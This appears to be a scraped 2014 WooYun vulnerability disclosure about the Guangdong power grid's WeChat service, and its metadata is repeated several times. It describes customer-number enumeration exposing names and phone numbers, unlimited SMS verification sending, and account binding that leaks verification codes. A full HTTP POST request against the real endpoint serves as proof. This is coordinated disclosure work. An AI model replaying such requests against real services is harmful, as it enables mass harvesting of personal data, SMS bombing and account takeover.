南方电网某平台存在各种缺陷最少几百万用户信息资料告急

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078545

漏洞标题：南方电网某平台存在各种缺陷最少几百万用户信息资料告急

漏洞作者：路人甲

提交时间：2014-10-07 15:03

修复时间：2014-11-21 15:04

公开时间：2014-11-21 15:04

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-07：细节已通知厂商并且等待厂商处理中
2014-10-11：厂商已经确认，细节仅向厂商公开
2014-10-21：细节向核心白帽子及相关领域专家公开
2014-10-31：细节向普通白帽子公开
2014-11-10：细节向实习白帽子公开
2014-11-21：细节向公众公开

简要描述：

各种验证审核不严格导致问题产生

详细说明：

源于“广东电网”微信公众账号。

危害一：根据“客户编号”遍历显示整个省电网用户姓名/手机号码
危害二：捆绑微信号时可向任意手机号码进行验证码发送，而且发送数量没限制可导致短信轰炸。
危害三：任意电网用户随意捆任意绑微信号（因手机验证码post直接返回显示），捆绑微信号后既可查看“用户家庭地址”又可随意修改电网用户资料
ps：一个微信号还能捆绑M个电网账号噢。(奇葩吧)

广东南方电网有多少用户？
客户编号：
7100113001
4100115001
1100111001
..........
..........
等等
有多少用户就能遍历多少用户！！！

漏洞证明：

POST /WeChat/wap/BundlingOptimize/messageAuth.do HTTP/1.1
Host: weixin.gd.csg.cn
Referer: http://weixin.gd.csg.cn/WeChat/wap/BundlingOptimize/bundling.do?
userName=o_16ZuO6sgSydFtMm5oeq_aVdJPU&toUserName=gh_as153c4a7ad2&time=1412654921848
Content-Length: 130
Cache-Control: max-age=0
Origin: http://weixin.gd.csg.cn
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; SM-N9005 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile 
Safari/534.30 MicroMessenger/5.4.0.66_r807534.480 NetType/WIFI
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: JSESSIONID=D575DD0602B939980151568D7E728010
Proxy-Connection: close
Connection: close
userName=o_16ZuO6sgSydFtMm5oeq_aVdJPU&toUserName=gh_as153c4a7ad2&type=&cityCode=1900&tel=&userNo=客户编号&msgtype=01&sendType=00

修复方案：

各种权限验证添加

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2014-10-11 17:11

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078545

漏洞标题：南方电网某平台存在各种缺陷最少几百万用户信息资料告急

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2014-10-07 15:03

修复时间：2014-11-21 15:04

公开时间：2014-11-21 15:04

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078545

漏洞标题：南方电网某平台存在各种缺陷最少几百万用户信息资料告急

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2014-10-07 15:03

修复时间：2014-11-21 15:04

公开时间：2014-11-21 15:04

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-078545"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云